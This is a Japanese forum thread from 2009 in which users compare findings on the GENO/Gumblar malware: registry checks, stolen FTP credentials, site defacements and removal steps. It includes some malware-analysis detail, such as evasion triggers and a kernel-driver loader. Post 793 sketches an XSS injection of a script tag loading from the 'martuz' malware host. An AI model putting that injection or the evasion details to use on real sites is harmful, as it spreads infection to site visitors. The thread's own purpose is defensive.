なんか違ったっぽい?とりあえずもう一度やってみたけど、やっぱし下部にブロックしましたって言うのが出てこない。
NoScriptのアイコンにマウス乗せておくと、きちんとブロックしましたって出たから、問題は無いようだけど気持ちは悪いね

779 :192.168.0.774:2009/05/19(火) 12:46:00 ID:Ni9zQrjI0
>>777
先生、「受理 2009.04.09 15:27:37」

一月前の結果ですぜ、それw

780 :192.168.0.774:2009/05/19(火) 12:47:31 ID:9nVAwa4a0
>>759
この挙動の説明だけど、

The Trojan will attempt to delete itself if processes containing the following strings are executed:
* gmer
* le38

The Trojan will attempt to delete itself if a URL that contains the following string is accessed:
DaonolFix

この2つの意味がよくわからん。
gmerや le38ってなにを避けようとしてるんだろ。
DaonolFixってのも今ひとつよくわからない。


781 :192.168.0.774:2009/05/19(火) 12:52:08 ID:YPsJVP/N0
system32.exe ってのは、なにしたらでてくるんだろう
しらべてみなければ…。

782 :192.168.0.774:2009/05/19(火) 12:53:16 ID:9mkDV7BY0
>>778
設定(オプション)を見直してみるといいよ、すれ違いなんで詳しくは書かないけど
解説してるサイト腐るほどあるしね、今ググるの怖いだろうけどw

783 :192.168.0.774:2009/05/19(火) 12:53:51 ID:BvLFmuib0
仮想でmartuz.cn感染させたPCにはsystem32.exeは存在しなかった

784 :192.168.0.774:2009/05/19(火) 12:55:52 ID:kGobtrBpP
>>779
あ、すまんw

http://www.virustotal.com/jp/analisis/e3155860dfa57d4cb4fde129360cf184

785 :192.168.0.774:2009/05/19(火) 13:01:21 ID:m4p3L/VDO
てことは感染したPCにはsystem32.exeが入ってるって事でFA?

786 :192.168.0.774:2009/05/19(火) 13:02:43 ID:YZkv6Zhr0
お前が理解するのは無理だと思うよ

787 :192.168.0.774:2009/05/19(火) 13:03:06 ID:g0aWXVjq0
>>784
system32.exeで検索したらこんなん出てきたぞ?

[ウイルス情報:Win32.Sddrop.D]
http://www.casupport.jp/virusinfo/2004/win32_sddrop_d.htm

[Windows XP を起動すると警告メッセージ "C:\Windows\System32\System32.exe が見つかりません" が表示される]
http://support.microsoft.com/kb/833767/ja

感染してるって事でFAじゃね?

788 :192.168.0.774:2009/05/19(火) 13:08:20 ID:YPsJVP/N0
GENO系ウイルス単体で、system32.exe が出現するかは謎が残るものの、
system32.exe などという正規ファイルはNTにはないので、
何かが巣食ってるのはほぼ間違いないといっていいかと

789 :192.168.0.774:2009/05/19(火) 13:12:26 ID:guqo9j390
>>787
いや、それは既に見たんだが、それらちは違うみたい。
コードを流用した亜種かもね。

>>785
全ての感染サイトで入ってくるとは限らない。
たまたまGENO感染以前に別途感染していたのかも知れないし。
ただ、自分が感染したのはGENO汚染サイト閲覧時で間違いない。

問題は、avast!で防げない、検出されないってこと。
いまGENO絡みでavast!一辺倒になってる人が多いみたいだからねえ・・・
しかも主要な無料オンラインスキャンでも検出できないという。


790 :786:2009/05/19(火) 13:14:05 ID:YZkv6Zhr0
見つからないと思ったらここに誤爆ってたorz
スマソ

791 :192.168.0.774:2009/05/19(火) 13:14:17 ID:ebHg3CWR0

今更ながら、過去の情報を…
当時はReaderが9.1だったが、意図的に9.0を上書きして検体入手を試みた時です。
4/5版を入手した際に、フォルダ移動しようとして、ファイルの上にドラッグして
exeを発動(発動したexeは自己消滅)させた時の挙動。

・新しく生成された34.exeをFWが通信許可求めてきたのでブロック。
・u.batと34.exeが残る状態で捕獲して削除(現行版はe.batだったかな)
・再起動するとcmd.exe起動不可(エクスプローラー起動)。→現行版では発生しないらしい
 CMD.exe動作不良の派生結果として、SP+メーカーの動作不良(ダウンロードはできるが統合作成できず)。
・レジストリエディタ起動不可(別名にリネームで起動)。→現行版では発生しないらしい
・どのセキュリティソフトも検知はしなかったが、オンラインゲームの不正プログラム防止の
 nProtectの動作を阻害したらしく、RagnarokOnlineの起動ができなくなったのを確認。
 →現行版でも動作不良を起こすかは不明。

新規の情報としては、nProtect GameGuardと干渉したことがあるってことだけ。
現行版でも干渉するかどうかは不明。

792 :192.168.0.774:2009/05/19(火) 13:15:19 ID:vBCuvc4qO
>>778
それ両方のサイトが同じドメインだったりしないよね?
NoScriptはドメイン単位での許可不許可だから
複数のタブに同じドメインのサイト開いてると、
どれか1つで許可すると全部で許可されたことになるよ

793 :192.168.0.774:2009/05/19(火) 13:20:37 ID:IlBvShIz0
ふと思ったんだが
XSSで script src="//martuz" を入れられたら、そのサイト見た時に同じ事おきるよな

XSS対策されてない時点で云々ってのは置いておいて


794 :192.168.0.774:2009/05/19(火) 13:24:36 ID:zBDewp1I0
感染PC持ってるけどsystem32.exeはない感じだよ

795 :192.168.0.774:2009/05/19(火) 13:25:48 ID:oJ5eOA/M0
http://127.0.0.1/

ここ見て開けたらとてつもなくやばいという情報を聞きましたがどうなんでしょう?

796 :192.168.0.774:2009/05/19(火) 13:27:46 ID:z5DAyYib0
うちのXPはsqlsodbc.chmが1323バイトで感染濃厚。
system32.exeの存在なし

797 :192.168.0.774:2009/05/19(火) 13:28:10 ID:JNA/OZ/u0
>>795
山田オルタナティブでググレカス

798 :192.168.0.774:2009/05/19(火) 13:28:32 ID:9nVAwa4a0
>>795
自分でIIS入れたりしていないなら、ヤバいだろうね。

799 :192.168.0.774:2009/05/19(火) 13:29:10 ID:Ni9zQrjI0
>>795
127.0.0.1はローカルループバック(自PCを見るって事)なんでそれが開くという事は
あなたのPCは鯖として公開されているっつー事です。
自分でWeb鯖なり公開してるのであれば正常ですが、そんな事した覚えが無い場合は…ね?判るでしょ?

800 :192.168.0.774:2009/05/19(火) 13:30:17 ID:9nVAwa4a0
>>794
うん、こんなわかりやすい名前のファイルは、これまでの傾向からして
作らないと思う。

801 :192.168.0.774:2009/05/19(火) 13:31:12 ID:oJ5eOA/M0
>>764
ありがとう
愛してる

802 :192.168.0.774:2009/05/19(火) 13:31:38 ID:xNz70xs60
お前らがGENO GENO言うから「日本のGENO = Gumlar」と補足されたじゃねーかw
ttp://blog.scansafe.com/journal/2009/5/18/japans-geno-gumblar.html

803 :192.168.0.774:2009/05/19(火) 13:34:27 ID:zBDewp1I0
それからついでに・・・。

PC3台所有中1台感染
サイトは5サイト管理中3サイト感染

感染PCはネットワークから物理的に遮断している状態
PC2台は推奨されている対策を実施

3サイトの内訳
HTMLのみのサイト
MTのサイト
Modxのサイト

MTとModxは未感染のPCからFTPパスを変更しレンサバのファイルマネージャーより該当コードを削除
HTMのみのサイトは未感染のPCからFTPパスを変更せずにファイルマネージャーから該当コードを削除

するとFTPパスを変更していないサイトは該当コード削除後1時間ほどで改ざんされました。
改ざんの更新日時をみると2分間の間に20ほどのファイルが改ざんされています。
階層は3層目まででした。
そこで、再び改ざんされたサイトもFTPパスを変更した後該当コードを削除したところ
その後の改ざんは確認できません。

ちなみにCMS系の改ざんは吐き出したHTMLやPHPを改ざんされるほか
システム系のPHPも改ざんされていました。


804 :192.168.0.774:2009/05/19(火) 13:34:30 ID:m4p3L/VDO
>>794
感染PCのsqlsodbc.chmは書き換えられてるよね?

805 :192.168.0.774:2009/05/19(火) 13:35:18 ID:hATntEpM0
> So folks doing Gumblar research via the Web would do well to add GENO in as a search term.
いいぞいいぞw

806 :192.168.0.774:2009/05/19(火) 13:35:32 ID:0dg2mPFE0
世界にGENOの醜態を発信!

807 :192.168.0.774:2009/05/19(火) 13:35:32 ID:u00yUEHF0
>>802
GENOが世界に羽ばたいたな!
宣伝した礼ぐらい欲しいものだ。

808 :192.168.0.774:2009/05/19(火) 13:36:12 ID:zBDewp1I0
>>804
ばっちり書き換えられてます。

809 :192.168.0.774:2009/05/19(火) 13:37:29 ID:oJ5eOA/M0
>>797-799
ありがとうございます!

810 :192.168.0.774:2009/05/19(火) 13:38:05 ID:zBDewp1I0
追伸
5サイト中3サイト感染したが
感染していない2サイトは

PC感染後FTP接続を行ってないサイトでした。

ちなみにFFTPを使用しています。


811 :192.168.0.774:2009/05/19(火) 13:40:19 ID:uBRv0bUoP
>>803
>システム系のPHPも
その辺嫌だねぇ

812 :192.168.0.774:2009/05/19(火) 13:40:27 ID:m4p3L/VDO
>>808
じゃあ今更だがやはり感染を確認するにはsqlsodbc.chmを見るしかないのか

813 :192.168.0.774:2009/05/19(火) 13:40:52 ID:IyKOpCbn0
>>765
調べたけどウチには無いなあ

814 :192.168.0.774:2009/05/19(火) 13:41:31 ID:tP4n383f0
GENOwwwwwwww恥ずかしすぎるwwwwww
俺なら改名するか店たたむwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

815 :192.168.0.774:2009/05/19(火) 13:42:22 ID:oJ5eOA/M0
484 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/05/19(火) 12:48:03
GENOって
ttp://www.itmedia.co.jp/news/articles/0905/19/news022.html
ここ見るとJSRedir-Rだよね?

ttp://www.avira.com/it/threats/section/vdfhistory/ivdf_no/7.01.03.183/7.01.03.183.html
iVDF version 7.01.03.183 detailsでリストに
JS/Redir.R
ってあるから対応してるってこと?


Avira AntiVirも怒涛のアップデートでついに対応していたらしい。

816 :192.168.0.774:2009/05/19(火) 13:45:02 ID:xNz70xs60
>>815
・異なるベンダー間で同じ名称になることはほぼ無い。
・仮に同じ物として、「JS」と付くとおり検知したのはJavaScriptだが
 これはほぼ無限のバリエーションがあるので全て撃墜できるとは限らない。

817 :192.168.0.774:2009/05/19(火) 13:46:15 ID:oJ5eOA/M0
そうでしたか。
まあ対応への第一歩と見ておきます

818 :192.168.0.774:2009/05/19(火) 13:46:28 ID:Ni9zQrjI0
>>789
とりあえず感染元は判るかな?(アドレス晒す時はドットを●なり■なりで置換して二次感染防げるようにしてね)
今までの流れからしてここでがらっと変えてくるのもなんか違うと思うから
おそらく感染元に別件のトロイドロッパ仕掛けられてたんじゃねーかと推測…

819 :192.168.0.774:2009/05/19(火) 13:48:01 ID:m3Ey5wlo0
GENOの海外の感染ブログ発見した。
Googleによって
このサイトはコンピュータに損害を与える可能性があります。
3時間前 投稿者: Jeremy
になってたけどどうしよう。

820 :192.168.0.774:2009/05/19(火) 13:50:48 ID:xNz70xs60
>>819
放っといていいんじゃねーの?
Googleに有害判定されたらさすがにバカでも過疎ブログでも気づくと思われ

821 :192.168.0.774:2009/05/19(火) 13:51:48 ID:cTF9aljw0
>803
検証ありがとうございます
参考になります

822 :192.168.0.774:2009/05/19(火) 13:51:59 ID:m3Ey5wlo0
>>820
Urlはいらないの?

823 :192.168.0.774:2009/05/19(火) 13:52:49 ID:YPsJVP/N0
>>802
わははははは^^;;

サイト名ですかこれ。って思われてる様子 そんくらいでちょうどいいw
影響力があったからこそ名が残り、そして、吊し上げには当たらない。くらいでいいんだ

まあ、GENOたんも素人集団じゃないんだから、ほんましっかりせえよと言いたいがw

824 :192.168.0.774:2009/05/19(火) 13:53:28 ID:xNz70xs60
>>822
>>687

825 :192.168.0.774:2009/05/19(火) 13:55:00 ID:Ni9zQrjI0
>>803
検証乙
ちなみにHP改竄はIPどっから(cn?他?)だったのかな?ログ残ってたら教えて欲しい

826 :192.168.0.774:2009/05/19(火) 13:55:35 ID:vSwxXbQJ0
>>802
ワロタw

827 :192.168.0.774:2009/05/19(火) 13:56:23 ID:56nxk1fM0
>>823
GENOが素人に毛がはえた程度
に思えてきた

828 :192.168.0.774:2009/05/19(火) 13:58:31 ID:EC96LNGF0
そういえば改竄IPの情報は1,2箇所でアメリカからとしか見てないな
それこそ感染者の多い同人板で改竄IPの情報集められないかな?

829 :192.168.0.774:2009/05/19(火) 14:00:23 ID:ZCzBcoms0
vm三つ作って感染pc、感染サイト、lvやcnサイトの代理って出来んかのう
うまくすれば感染したpcやサイトから洩れる情報が判るかも知れない気がする・・・キガ・・ス・キ

830 :192.168.0.774:2009/05/19(火) 14:00:36 ID:Ni9zQrjI0
>>828
協力を求めたいとこだが…改竄された鯖のアクセスログを〜とか言って理解して貰えるのかがw

831 :192.168.0.774:2009/05/19(火) 14:02:20 ID:6OqI5kAD0
>>828
どうやればそれが分かるのか、とかが分かれば協力する奴もいると思うよ

832 :192.168.0.774:2009/05/19(火) 14:02:33 ID:LnA10LKaP
初心者の質問で申し訳ないですが、現在ブラウザはIE、火狐共にスクリプトをoffにしています。
ハンゲームをやる時はIEのスクリプトを許可するか、火狐のNoScriptで
サイトを一時的に許可もしくはハンゲームのサイトを許可にしてやれば大丈夫でしょうか?

833 :192.168.0.774:2009/05/19(火) 14:03:12 ID:QXeKbW6W0
Adblock Plusがあるのに、頑張ってNoScriptを使わなくてもいい気がする。

834 :192.168.0.774:2009/05/19(火) 14:04:47 ID:HxuyJ7oC0
>>832
韓国経由で感染します

835 :192.168.0.774:2009/05/19(火) 14:05:28 ID:xNz70xs60
>>832
http://namidame.2ch.net/mmoqa/
http://jfk.2ch.net/netgame/

836 :192.168.0.774:2009/05/19(火) 14:06:49 ID:+JZSacHi0
>>828
ウィンドウズのアップデートすら図解つきで説明しないとだめ、してても質問がくる場所だぞ。
場所の性質上、無知な大人だけじゃなくて本物のリア小リア中もいるから仕方ないんだけど
おじいちゃんおばあちゃんにPC教えるような苦行に耐える覚悟がないと…
それより普通のまとめサイトにIPとれないかって書いてもらうほうがいいと思う

837 :192.168.0.774:2009/05/19(火) 14:08:21 ID:vSwxXbQJ0
>>828
同人板は感染者は多いみたいけど、協力は得られるかなぁ…
多くの感染者はもともとセキュリティに関心が無いんだろうし
サイト消して、クリーンインスコして、パス変えて、やるべき事さえやったら
あとはもうウイルスに関わり合いたくもないって感じじゃなかろうか。
PC詳しくない人はそもそも、感染方法の確認だけでも
「まとめ見てもサッパリ意味がわからない」って手間取るし。
ややこしいことにわざわざ協力してくれる人は少ないかも

838 :192.168.0.774:2009/05/19(火) 14:08:52 ID:vSwxXbQJ0
のろのろ書いてる間に同じようなレスが既に沢山付いてた すまん

839 :192.168.0.774:2009/05/19(火) 14:09:21 ID:IM5uiscE0
流石にWindows7RC-OSでの情報は無いか

840 :192.168.0.774:2009/05/19(火) 14:13:37 ID:Ni9zQrjI0
>>839
とりあえずGENOについてはVista(UAC ON)以降のWinOS(鯖向け含む)は対象外、との話

841 :192.168.0.774:2009/05/19(火) 14:16:00 ID:XN+oLxgU0
検体の入手に成功してる人はadobeのバージョンどうなってる?

842 :192.168.0.774:2009/05/19(火) 14:16:12 ID:IM5uiscE0
>>840
トンクス。
問題になってるsqlsodbc.chmの標準サイズがわからなかったから、正直ちと焦ってたぜ

843 :192.168.0.774:2009/05/19(火) 14:17:06 ID:u00yUEHF0
>>839
NT6.0以上のカーネルはスクリプトで弾いてる

844 :192.168.0.774:2009/05/19(火) 14:17:34 ID:xNz70xs60
>>839
スクリプトでNT6.xを蹴ってるんだってば。
NT5.0 = 2000
NT5.1 = XP
NT5.2 = XP64 Server2003
↑アウト
↓セーフ
NT6.0 = Vista Server2008
NT6.1 = 7

845 :192.168.0.774:2009/05/19(火) 14:18:06 ID:2Ipd4vnt0
gumlarって名前は覚えにくいし
GENOの方がいいな

846 :192.168.0.774:2009/05/19(火) 14:18:35 ID:THSV4bqZ0
書かれてあったことはすべてやって感染していないと思うが、サイトの更新するのが怖い。

847 :192.168.0.774:2009/05/19(火) 14:19:04 ID:EC96LNGF0
同人板で協力を仰ぐのは無理か・・・
わかっていそうな人ならここも見ていそうだから自主申告してくれるのを待つしかないか

848 :192.168.0.774:2009/05/19(火) 14:19:20 ID:mD+I1W8i0
bぬけてないか

849 :192.168.0.774:2009/05/19(火) 14:20:14 ID:Ni9zQrjI0
>>845
覚えにくいのは確かなようだなw
○gumblar ×gumlar

850 :192.168.0.774:2009/05/19(火) 14:21:47 ID:7UiOYUGH0
このスレ開こうとするとavastが反応するのですが、どうしてですか?

851 :192.168.0.774:2009/05/19(火) 14:21:57 ID:wA8EwCsv0
>>849
そもそもこれなんて読むんだ
ギャンブラー?ガンプラー?

852 :192.168.0.774:2009/05/19(火) 14:23:19 ID:xNz70xs60
ごめん >>802 打つ時にb抜けた
キー配列的にgumblerは打ちにくいんだよね…

853 :192.168.0.774:2009/05/19(火) 14:23:38 ID:tVLA0dSpO
>>847
まとめだけをサイトに貼ってる人もいるから記載されれば同人板以外からも協力得られるかも知れない

854 :192.168.0.774:2009/05/19(火) 14:24:21 ID:9nVAwa4a0
>>829
昨日から試してるんだけど。
感染VMにFWやら各種のsniffingツールやら入れて監視しようとすると
動作を止めたり自分自身を消したりするんだよね。

とりあえず
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux
に書き込まれるファイルが起点となって動作しているのは確実で、
こいつさえ殺してやれば少なくとも主要な機能は止まる。
殺し方としては、gnome氏の書かれている方法でOK。
要はSafe Modeで起動して、レジストリに書かれているファイルを適当に書き換えて
壊す。で、再起動後にレジストリを正常値に書き直す。

本体を呼び出すローダー部分がカーネルドライバなもんで、挙動を追いかけにくい。

855 :192.168.0.774:2009/05/19(火) 14:24:27 ID:xNz70xs60
また間違った
もう嫌だ

856 :192.168.0.774:2009/05/19(火) 14:25:09 ID:cTF9aljw0
>850

>737
>738


857 :192.168.0.774:2009/05/19(火) 14:30:47 ID:vElGKTyLP
どのサイトのオンラインスキャンが確実ですか?

858 :192.168.0.774:2009/05/19(火) 14:34:19 ID:wA8EwCsv0
ようやくバスターの更新が来たぞ

859 :192.168.0.774:2009/05/19(火) 14:35:35 ID:u00yUEHF0
>>854
snifferを自作しろとの神からのお告げだろ

860 :192.168.0.774:2009/05/19(火) 14:38:31 ID:xt/j6AI60
植民地政策で同人板を乗っ取っておいて

「俺男だけど同人板は野蛮なネトウヨキモオタ男だらけ」
「俺男だけど平和な腐女子は皆801板に篭ってるぞ」

だってよ

861 :192.168.0.774:2009/05/19(火) 14:40:17 ID:3+N6lokm0
>>847
いけるかもって意見もあるだろう
最初から聞く気ないんじゃないのか

862 :192.168.0.774:2009/05/19(火) 14:43:14 ID:xiSmnzbO0
同人板にも詳しい人はいるみたいだし、理解して協力してくれる人いると思う

でも今ちらっと見たらまだセキュ板と戦ってるから
今向こうで書くと巻き込まれるかもしれない

863 :192.168.0.774:2009/05/19(火) 14:47:09 ID:9nVAwa4a0
>>857
残念ながら確実なものはひとつもない。
オンラインスキャンかけても現時点ではほとんど無駄。
つか、手元の4種はIEではSymantecやAdobeのサイトに繋がらない。
Firefoxだと繋がる。

864 :192.168.0.774:2009/05/19(火) 14:47:26 ID:YZkv6Zhr0
多分こっちが低レベルな質問責めでげんなりしてるように
向こうも叩きに巻き込まれてげんなりして協力しようにもできない人
いるんじゃないかな

どこかで協力者募集できればいいんだけどな

865 :192.168.0.774:2009/05/19(火) 14:48:50 ID:YPsJVP/N0 ?2BP(0)
>>854
DllMainですべて仕事してるだけ PEファイルなんだが、EXEじゃないんだな
ただし、自分をいったん、FileIOで読み直して、そこに制御を移してるはず

※なぜ俺が小出しかというと、最新版を全読破してないから。しかし、今もそんなかわらんだろ

866 :192.168.0.774:2009/05/19(火) 14:48:54 ID:kWpcz8Bn0
>>860
あの板は実質801板に乗っ取られてるようなもんだから今更
腐ジャンルと大規模厨ジャンル以外はジャンルスレすら立たないのがいい証拠
ジャンルのスレなんてあってもなくてもいい物だからなくても別に構わないがな

867 :192.168.0.774:2009/05/19(火) 14:50:11 ID:EC96LNGF0
>>861
向こうのGENOスレ見てきたらこれ以上混乱させたくなくなった
今でさえ真面目にまとめ作ってる連中のレスとか埋もれそうだ
情報募集の声をかけるとしても、もう少し落ち着いてからの方が良いいかなと

868 :192.168.0.774:2009/05/19(火) 14:56:05 ID:NizVX+H5O
携帯から失礼。
サイト持ちの腐だけどできる限り協力するよ。
何すればいい?

869 :192.168.0.774:2009/05/19(火) 14:56:06 ID:iuUi1XGl0
こっちで向こうの話する人にもうんざりだな

870 :192.168.0.774:2009/05/19(火) 14:56:08 ID:nEqJXd880
同人なんてほっとけよ
あの惨状見た上で同人に協力頼もうとする奴って何なの?
馬鹿なの?死ぬの?

871 :192.168.0.774:2009/05/19(火) 14:58:10 ID:ebHg3CWR0
そうだね。そろそろ雑談は控えるか他でやった方がいいかも。

取り敢えず、金澤烏鶏庵(ukokkeiのとこ)は、対応中ですとの返答来ました。(他の人が既に除去確認済みの模様)

17箇所位報告入れて、対応の連絡きたのは4〜5件てとこかな。返答無しでこっそり対応してるとこも幾つか。
返事はいらないけど、どこも対応をしっかりしてくれればそれでいいや。

でも、なにも無かった風を装うのは名称つけられたGENOみたいに評判落とすだけだと思うな。
訪問者への告知をもしっかり行なって、始めて対応完了だと思う。

872 :192.168.0.774:2009/05/19(火) 14:58:15 ID:agLWBNyMO
>>825
ゴメン
外でてきちゃった
帰ったら報告するよ

873 :192.168.0.774:2009/05/19(火) 15:03:16 ID:vElGKTyLP
「表示の登録されている拡張子は表示しない」のチェックが外れているか
確認。外れていない場合は外す。


これは何の意味があるの?



874 :192.168.0.774:2009/05/19(火) 15:03:19 ID:YPsJVP/N0
>>868 とりあえず、このスレで待機。いやまじで。とりあえず乙

875 :192.168.0.774:2009/05/19(火) 15:04:28 ID:oJ5eOA/M0
>>854
てことは、HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\
にauxというキーがなければとりあえずは安心しといていいのかな?

876 :192.168.0.774:2009/05/19(火) 15:06:32 ID:oJ5eOA/M0
>>873
拡張子を表示していないと初心者が混乱するから念のため書いてあるだけだろうね。
「あれ!?書いてあるファイル名と違う!」と混乱するのが目に見えているから。

877 :192.168.0.774:2009/05/19(火) 15:07:39 ID:+Nv0TkV90
>>875
auxはデフォである。値がwdmaud.drvだったらとりあえずOK。

878 :192.168.0.774:2009/05/19(火) 15:08:00 ID:yKfFYkBT0
janeでみてたら「>>レス番号」の番号が+100されてたんだけど。ウイルス?バグ?なぜか直った。

879 :192.168.0.774:2009/05/19(火) 15:08:14 ID:wo0Vd/DP0
>>724のチェックページがバージョンアップしたみたい
>>※オマケの精度がちょっとだけ上がりました(2009-05-19 14:30現在)

880 :192.168.0.774:2009/05/19(火) 15:09:05 ID:FsI7qAmL0
コピペのコピペで失礼

257 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/19(火) 14:30:13
ttp://www■arad■jp
ネクソン アラド戦記公式HP
安全の為、ピリオドを■にしとくけど、GENOチェッカーで800%って出る。
ここを開かないとゲーム出来ないんだが、マジで感染してるのかな?
アラド\(^o^)/

881 :192.168.0.774:2009/05/19(火) 15:09:31 ID:Ni9zQrjI0
>>875
いや、通常はauxのキーは存在する。正常ならサウンド系が割り当てなんで
Windows 2000 : mmdrv.dll
Windows XP : wdmaud.drv
(ドライバーによっては違います、要確認)


882 :192.168.0.774:2009/05/19(火) 15:11:17 ID:oJ5eOA/M0
>>877
俺のはキーも値もないみたいだから安心しとくよ。

883 :192.168.0.774:2009/05/19(火) 15:12:55 ID:vElGKTyLP
ウィルスバスター2009は対応してるの?

884 :192.168.0.774:2009/05/19(火) 15:13:01 ID:nMhXw8IP0
おれも無いから安心

885 :192.168.0.774:2009/05/19(火) 15:14:02 ID:8FgxAqIl0
>>881
aux存在しないな、おれの

886 :192.168.0.774:2009/05/19(火) 15:14:57 ID:hTeKb6gy0
どうやったら感染出来るか教えて下さい

887 :192.168.0.774:2009/05/19(火) 15:15:39 ID:oJ5eOA/M0
auxがない人結構いるんだねw

888 :192.168.0.774:2009/05/19(火) 15:16:06 ID:Ni9zQrjI0
>>882
>>884
>HKLM\〜
を勘違いしてないか?
HKLMはHKEY_LOCAL_MACHINEの略
regeditで見るなら
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
ここな

889 :192.168.0.774:2009/05/19(火) 15:17:00 ID:oJ5eOA/M0
そんな凡ミスしませんよ

890 :192.168.0.774:2009/05/19(火) 15:17:57 ID:8FgxAqIl0
ちょうどそこを見てるがやっぱり何度見直しても存在しない

891 :192.168.0.774:2009/05/19(火) 15:18:04 ID:mlQ2VeKdP
どうでもいいが aux だけで判断するのは、ちょい危険だろ

892 :192.168.0.774:2009/05/19(火) 15:19:14 ID:vElGKTyLP
なんで誰も質問に答えないの?
糞ニートばかりで社会性が欠落してんの?

893 :192.168.0.774:2009/05/19(火) 15:19:23 ID:nMhXw8IP0
だからそこに無いって。
おえの脳内だけで世界はまわってないぞ。

894 :192.168.0.774:2009/05/19(火) 15:19:35 ID:BnkV3z9W0
>>880
ログイン時にゲームのキャラデータ表示したりするスクリプトが反応してるだけっぽい
ウィルスのスクリプトではないんだがウィルスのスクリプトに含まれてる部分があるから
とりあえず安全

895 :192.168.0.774:2009/05/19(火) 15:20:03 ID:oJ5eOA/M0
http://www.dotup.org/uploda/www.dotup.org43200.png
ね?ないでしょ?

896 :192.168.0.774:2009/05/19(火) 15:20:18 ID:5cJRdv4Y0
>>892
>>876

897 :192.168.0.774:2009/05/19(火) 15:20:37 ID:nMhXw8IP0
アラドざっと見問題なさげ
読み込んでるjsまで見てない。

898 :192.168.0.774:2009/05/19(火) 15:21:58 ID:JNA/OZ/u0
>>897
読み込んでるjs見てみたが別に変な記述はなかったよ

899 :192.168.0.774:2009/05/19(火) 15:22:16 ID:xiSmnzbO0
>>880
表示に問題ないように見える
何かのスクリプトに反応してるだけじゃないか?

900 :192.168.0.774:2009/05/19(火) 15:22:39 ID:wA8EwCsv0
>>892
さっきアップデートしたらパターンファイル更新された
しかし中身が何かはわからない
当方JS斬ってるのでトレンドマイクロのパターンファイル詳細が見られない

901 :192.168.0.774:2009/05/19(火) 15:23:16 ID:oJ5eOA/M0
>>892
ウイルスバスター2009を使っていないからわからない
該当スレに誘導するからそこで聞くかどうかしてみては?

【アンチ】ウイルスバスター2009 Part15【日記帳】
http://pc11.2ch.net/test/read.cgi/sec/1242125567/

902 :192.168.0.774:2009/05/19(火) 15:25:26 ID:9mkDV7BY0
>>833
Adblock Plusでどうやんの?

903 :192.168.0.774:2009/05/19(火) 15:27:39 ID:Ni9zQrjI0
>>895
OKOK確かにないね

一応、今までの報告からAUX、AUX1~9、MIDI、MIDI1~9辺りが書き換えられてたという話
(MIDIのほうは他のトロイだっけかな)

>>900
whatsnew見に行ってきたが短縮名のみずらずら記述されてっからドレが該当するのかさっぱりw

904 :192.168.0.774:2009/05/19(火) 15:30:57 ID:ZCzBcoms0
>>854
そうなるとトラフィック見るためのvmも要るってことか
それでもローカルIPチェックして動かない可能性もあるな

感染pcの利用状況までチェックしてますか・・
なんだかマルウェア制作のテスターさせられてる感じだなあ

905 :192.168.0.774:2009/05/19(火) 15:31:43 ID:YPsJVP/N0
aux の件、俺の砂箱では、Drivers32に、aux2ってキーができて、そこに入った
規則性は不明

いやまじで>>154 (自薦)やってみてくれないか 俺の予想では、
8B 8B/8B 8B 未感染
8B 8B/E9 E9 感染濃厚
なんだが、正常の値、特に、セキュリティソフトがかかった状態での値を集めないと、
リリースにもっていけないんだわ

906 :192.168.0.774:2009/05/19(火) 15:31:56 ID:m0FB93L50
>>900
バスター使っててバスターのサイトが信頼できないなら何も言えません


907 :192.168.0.774:2009/05/19(火) 15:32:35 ID:THSV4bqZ0
最近、リカバリしたばかりでauxある
大丈夫みたいだ

908 :192.168.0.774:2009/05/19(火) 15:33:52 ID:ag+YrlA70
auxってAUX端子のこと??


909 :192.168.0.774:2009/05/19(火) 15:34:44 ID:qThGDHRH0
なあお前ら、念のために聞いておくが・・・

AdobeReaderを8以前から最新の9.1にアップデートして安心してないよな?
普通にAdobeからダウンしただけでは9.1.0がインスコされる。
しかしこれではGENOウィルスに無防備。

9.1を起動してアップデートすると9.1.1になる。
これがGENOウィルス対策版だ。


910 :192.168.0.774:2009/05/19(火) 15:37:25 ID:yKfFYkBT0
win7RCでもauxありましたよ

911 :192.168.0.774:2009/05/19(火) 15:44:29 ID:wA8EwCsv0
>>906
信頼してないわけじゃねえよ、トレンドマイクロのページ見るたびにJS斬るのが面倒だっただけだ
とりあえずJS斬って見て来たけど、JSRedir-Rの文字はなかった

912 :192.168.0.774:2009/05/19(火) 15:44:55 ID:O4WXNFwJ0
素朴な質問なんだがルーター介して
ファイヤーウォールが導入されてれば
感染しないんじゃないの?

913 :911:2009/05/19(火) 15:46:57 ID:wA8EwCsv0
あ、パターンファイルの中にHTML_JSREDIR.AEとかいうのがあったけど、これじゃないよな?

914 :192.168.0.774:2009/05/19(火) 15:47:15 ID:uJtq3znQ0
>>912
abobereaderとflashplayerの脆弱性を使ってるから
いくら防いでも

915 :192.168.0.774:2009/05/19(火) 15:47:36 ID:YPsJVP/N0
>>912
ファイアウォールがいくら働いていても、IEは許可してるだろう
そのIEを通じて入ってくるんだから仕方ない
こんなだから、懲りた連中はIEを許可してない

感染後、外からの制御ができないはずだってのも当たらない
やはり、IEを乗っ取って、パケットを送ろうとするわけから、すり抜ける

916 :192.168.0.774:2009/05/19(火) 15:52:29 ID:qThGDHRH0
abobereaderとflashplayerを最新にしても不安だな

917 :192.168.0.774:2009/05/19(火) 15:53:00 ID:m4p3L/VDO
火狐使ってるんだが、ブラウザ設定でjs無効にすんのと
Noscript入れるのではどう違うの?


918 :192.168.0.774:2009/05/19(火) 15:55:14 ID:uJtq3znQ0
>>917
noscriptは例外設定ができる

919 :192.168.0.774:2009/05/19(火) 15:55:15 ID:jVGKeKqi0
>>917
noscは許可したいサイトを個別に設定できるから便利

920 :192.168.0.774:2009/05/19(火) 15:56:03 ID:vmna4rQ80
>>917
ブラウザ設定のJS無効の方はなにかの用でJS有効にする度に全部有効⇔全部無効ってなる
Noscriptは信頼できるHPだけJS有効で他は無効とかできる

921 :192.168.0.774:2009/05/19(火) 15:57:38 ID:0vthBrIC0
個人的にはDonut RAPTでデフォルト禁スクリプトの方が楽。
火狐はどうも使いづらい。

922 :192.168.0.774:2009/05/19(火) 16:03:20 ID:GIdN7NVi0
>>921
よう俺

923 :192.168.0.774:2009/05/19(火) 16:07:10 ID:MmxOqtet0
